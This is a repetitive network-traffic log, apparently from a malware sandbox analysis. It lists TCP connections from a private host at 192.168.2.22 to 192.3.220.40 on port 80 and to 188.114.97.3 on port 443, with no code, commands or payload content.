                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
